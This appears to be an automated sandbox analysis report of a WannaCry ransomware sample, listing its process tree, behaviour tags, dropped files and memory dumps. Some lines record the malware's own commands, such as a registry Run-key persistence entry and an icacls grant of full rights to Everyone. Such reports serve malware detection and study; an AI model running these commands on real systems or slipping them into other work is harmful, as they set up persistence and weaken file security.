- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mpvxsxzo192" /t REG_SZ /d "\"C:\ProgramData\mpvxsxzo192\tasksche.exe\"" /f4⤵
- Adds Run key to start application
- Modifies registry key
-
C:\ProgramData\mpvxsxzo192\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\mpvxsxzo192\taskse.exetaskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\mpvxsxzo192\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\mpvxsxzo192\taskse.exetaskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\mpvxsxzo192\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\ProgramData\mpvxsxzo192\taskse.exetaskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\mpvxsxzo192\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
-
C:\WINDOWS\mssecsvc.exeC:\WINDOWS\mssecsvc.exe1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\WINDOWS\tasksche.exeC:\WINDOWS\tasksche.exe /i2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\mpvxsxzo192\tasksche.exe"1⤵
-
C:\ProgramData\mpvxsxzo192\tasksche.exeC:\ProgramData\mpvxsxzo192\tasksche.exe2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\attrib.exeattrib +h .3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\mpvxsxzo192\00000000.eky
-
C:\ProgramData\mpvxsxzo192\00000000.pky
-
C:\ProgramData\mpvxsxzo192\00000000.res
-
C:\ProgramData\mpvxsxzo192\00000000.res
-
C:\ProgramData\mpvxsxzo192\175431600395137.bat
-
C:\ProgramData\mpvxsxzo192\@Please_Read_Me@.txt
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe.lnk
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\LIBEAY32.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\SSLEAY32.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libevent-2-0-5.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libevent_core-2-0-5.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libevent_extra-2-0-5.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libgcc_s_sjlj-1.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\libssp-0.dll
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\tor.exe
-
C:\ProgramData\mpvxsxzo192\TaskData\Tor\zlib1.dll
-
C:\ProgramData\mpvxsxzo192\b.wnry
-
C:\ProgramData\mpvxsxzo192\b.wnry
-
C:\ProgramData\mpvxsxzo192\c.wnry
-
C:\ProgramData\mpvxsxzo192\c.wnry
-
C:\ProgramData\mpvxsxzo192\c.wnry
-
C:\ProgramData\mpvxsxzo192\f.wnry
-
C:\ProgramData\mpvxsxzo192\m.vbs
-
C:\ProgramData\mpvxsxzo192\msg\m_bulgarian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_bulgarian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (simplified).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (simplified).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (traditional).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_chinese (traditional).wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_croatian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_croatian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_czech.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_czech.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_danish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_danish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_dutch.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_dutch.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_english.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_english.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_filipino.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_filipino.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_finnish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_finnish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_french.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_french.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_german.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_german.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_greek.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_greek.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_indonesian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_indonesian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_italian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_italian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_japanese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_japanese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_korean.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_korean.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_latvian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_latvian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_norwegian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_norwegian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_polish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_polish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_portuguese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_portuguese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_romanian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_romanian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_russian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_russian.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_slovak.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_slovak.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_spanish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_spanish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_swedish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_swedish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_turkish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_turkish.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_vietnamese.wnry
-
C:\ProgramData\mpvxsxzo192\msg\m_vietnamese.wnry
-
C:\ProgramData\mpvxsxzo192\r.wnry
-
C:\ProgramData\mpvxsxzo192\r.wnry
-
C:\ProgramData\mpvxsxzo192\s.wnry
-
C:\ProgramData\mpvxsxzo192\s.wnry
-
C:\ProgramData\mpvxsxzo192\t.wnry
-
C:\ProgramData\mpvxsxzo192\t.wnry
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\taskdl.exe
-
C:\ProgramData\mpvxsxzo192\tasksche.exe
-
C:\ProgramData\mpvxsxzo192\tasksche.exe
-
C:\ProgramData\mpvxsxzo192\tasksche.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\taskse.exe
-
C:\ProgramData\mpvxsxzo192\u.wnry
-
C:\ProgramData\mpvxsxzo192\u.wnry
-
C:\Users\Admin\Desktop\@WanaDecryptor@.bmp
-
C:\WINDOWS\tasksche.exe
-
C:\WINDOWS\tasksche.exe
-
C:\Windows\TEMP\0.WNCRYT
-
C:\Windows\TEMP\1.WNCRYT
-
C:\Windows\TEMP\10.WNCRYT
-
C:\Windows\TEMP\11.WNCRYT
-
C:\Windows\TEMP\12.WNCRYT
-
C:\Windows\TEMP\13.WNCRYT
-
C:\Windows\TEMP\14.WNCRYT
-
C:\Windows\TEMP\15.WNCRYT
-
C:\Windows\TEMP\16.WNCRYT
-
C:\Windows\TEMP\17.WNCRYT
-
C:\Windows\TEMP\18.WNCRYT
-
C:\Windows\TEMP\2.WNCRYT
-
C:\Windows\TEMP\3.WNCRYT
-
C:\Windows\TEMP\4.WNCRYT
-
C:\Windows\TEMP\5.WNCRYT
-
C:\Windows\TEMP\6.WNCRYT
-
C:\Windows\TEMP\7.WNCRYT
-
C:\Windows\TEMP\8.WNCRYT
-
C:\Windows\TEMP\9.WNCRYT
-
C:\Windows\tasksche.exe
-
C:\Windows\tasksche.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libeay32.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libevent-2-0-5.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libgcc_s_sjlj-1.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\libssp-0.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\ssleay32.dll
-
\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
-
\ProgramData\mpvxsxzo192\TaskData\Tor\zlib1.dll
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskdl.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
\ProgramData\mpvxsxzo192\taskse.exe
-
memory/308-50-0x0000000000000000-mapping.dmp
-
memory/316-661-0x0000000000000000-mapping.dmp
-
memory/556-647-0x0000000000000000-mapping.dmp
-
memory/800-655-0x0000000000000000-mapping.dmp
-
memory/808-641-0x0000000000000000-mapping.dmp
-
memory/808-652-0x0000000000000000-mapping.dmp
-
memory/836-48-0x0000000000000000-mapping.dmp
-
memory/860-60-0x0000000000000000-mapping.dmp
-
memory/948-635-0x0000000000000000-mapping.dmp
-
memory/1060-639-0x0000000000000000-mapping.dmp
-
memory/1340-633-0x0000000000000000-mapping.dmp
-
memory/1356-658-0x0000000000000000-mapping.dmp
-
memory/1476-418-0x0000000001DC0000-0x0000000001DD1000-memory.dmpFilesize
68KB
-
memory/1476-86-0x00000000017B0000-0x00000000017C1000-memory.dmpFilesize
68KB
-
memory/1476-85-0x0000000001BC0000-0x0000000001BD1000-memory.dmpFilesize
68KB
-
memory/1476-84-0x00000000017B0000-0x00000000017C1000-memory.dmpFilesize
68KB
-
memory/1476-70-0x0000000000000000-mapping.dmp
-
memory/1476-251-0x00000000017B0000-0x00000000017C1000-memory.dmpFilesize
68KB
-
memory/1476-252-0x0000000001BC0000-0x0000000001BD1000-memory.dmpFilesize
68KB
-
memory/1476-253-0x00000000017B0000-0x00000000017C1000-memory.dmpFilesize
68KB
-
memory/1476-419-0x00000000021D0000-0x00000000021E1000-memory.dmpFilesize
68KB
-
memory/1476-420-0x0000000001DC0000-0x0000000001DD1000-memory.dmpFilesize
68KB
-
memory/1504-643-0x0000000000000000-mapping.dmp
-
memory/1604-9-0x0000000010000000-0x0000000010010000-memory.dmpFilesize
64KB
-
memory/1604-5-0x0000000000000000-mapping.dmp
-
memory/1668-7-0x0000000000000000-mapping.dmp
-
memory/1696-0-0x000007FEF84F0000-0x000007FEF876A000-memory.dmpFilesize
2.5MB
-
memory/1836-52-0x0000000000000000-mapping.dmp
-
memory/1836-56-0x00000000012E0000-0x00000000012E4000-memory.dmpFilesize
16KB
-
memory/1848-663-0x0000000000000000-mapping.dmp
-
memory/1880-1-0x0000000000000000-mapping.dmp
-
memory/1928-640-0x0000000000000000-mapping.dmp
-
memory/1928-8-0x0000000000000000-mapping.dmp
-
memory/1996-649-0x0000000000000000-mapping.dmp
-
memory/2024-637-0x0000000000000000-mapping.dmp
-
memory/2024-62-0x0000000000000000-mapping.dmp
-
memory/2028-65-0x0000000000000000-mapping.dmp
-
memory/2028-64-0x0000000000000000-mapping.dmp
-
memory/2276-686-0x0000000000000000-mapping.dmp
-
memory/2304-689-0x0000000000000000-mapping.dmp
-
memory/2324-692-0x0000000000000000-mapping.dmp
-
memory/2408-694-0x0000000000000000-mapping.dmp
-
memory/2444-697-0x0000000000000000-mapping.dmp
-
memory/2460-699-0x0000000000000000-mapping.dmp
-
memory/2480-700-0x0000000000000000-mapping.dmp